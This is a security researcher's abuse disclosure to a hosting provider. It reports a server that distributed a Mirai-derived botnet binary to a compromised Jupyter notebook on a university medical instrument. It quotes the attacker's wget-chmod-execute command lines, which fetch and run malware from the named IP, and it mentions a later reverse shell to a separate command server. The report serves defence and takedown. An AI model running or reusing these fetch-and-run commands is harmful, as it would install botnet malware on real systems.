NuClide Research
Most recent
navigate open esc close Corpus index built 2026-06-07 23:58 UTC

← Research library

HIGH · Disclosure May 6, 2026

Cogent 38 87 117 84 Malware Host

Bill Rondell, Nick Adams & Dade Murphy — May 6, 2026 — high · disclosure — 2 min read — 368 words

To: abuse@cogentco.com Cc: abuse@nuclide-research.com Subject: Malware distribution host 38.87.117.84 (velonodes.in), served Hilix botnet binary used in medical research device compromise

Nicholas Michael Kloster / NuClide Research nicholas@nuclide-research.com

2026-05-06

Re: Cogent customer host 38.87.117.84 served Hilix botnet malware IP: 38.87.117.84 (rDNS velonodes.in, NetName DATALIX-CGNT-NET-2) Severity: HIGH

I’m an independent security researcher conducting good-faith AI infrastructure research under the NuClide Research umbrella (CISA disclosures CVE-2025-4364, ICSA-25-140-11). This is a malware-host disclosure.

The host 38.87.117.84 (rDNS velonodes.in, hosted on Cogent’s DATALIX-CGNT-NET-2) was used as a malware-distribution server for a Hilix botnet (Mirai-derivative) operation in 2026-04-29. The malware payload Hilix.x86_64 was downloaded by a compromised host at Universität Ulm Medical Faculty via:

wget http://38.87.117.84/Hilix.x86_64 -O x86_64
chmod +x x86_64
./x86_64 jupiter

Forensic evidence preserved in the victim host’s Jupyter notebook (/home/labuser/Untitled.ipynb, cell #11, modified 2026-04-29 22:51:08 UTC):

Connecting to 38.87.117.84 (38.87.117.84:80)
saving to 'x86_64'
x86_64               100% |********************************|  109k  0:00:00 ETA
'x86_64' saved
sh: line 1: ./x86_64: cannot execute binary file: Exec format error

The execution failed because the victim is an ARM-based embedded medical instrument (Cocoa Labs CL1-2544-043 neural amplifier). The attacker returned 6 days later with a different payload (socat reverse shell to a separate C2 at 172.233.96.208, disclosed separately to Akamai/Linode abuse).

Current status

External probes from NuClide’s research VPN (Mullvad EU exit) on 2026-05-07 02:00 UTC return HTTP 000 on ports 80, 443, 8080, 22, the host either:

  • Has been taken down (good)
  • Is filtering against scanner IPs
  • Has migrated the malware payload to a different URL

If the host is still operationally active, please confirm with the customer and request termination or null-route. If the host has already been remediated, this disclosure documents the historical use for your records.

The velonodes.in rDNS suggests this may be a compromised legitimate hosting customer (the name pattern fits residential / VPS hosting), not the botnet operator’s primary infrastructure. Customer-direct outreach (rather than termination) may be appropriate if they’re an unwitting victim.

Reference

Full case study with attack timeline + victim-host evidence: AI-LLM-Infrastructure-OSINT/blob/main/case-studies/commercial/multi-uni-ulm-jupyter-compromise-2026-05-06.md

Parallel disclosures sent:

  • it-sicherheit@uni-ulm.de + dfn-cert@dfn-cert.de for the victim’s incident response
  • abuse@akamai.com + abuse@linode.com for the active C2 (172.233.96.208) takedown

Happy to provide additional context if useful for your customer investigation.

Regards, Nicholas Michael Kloster / NuClide Research nicholas@nuclide-research.com AI-LLM-Infrastructure-OSINT

Samples linked to this disclosure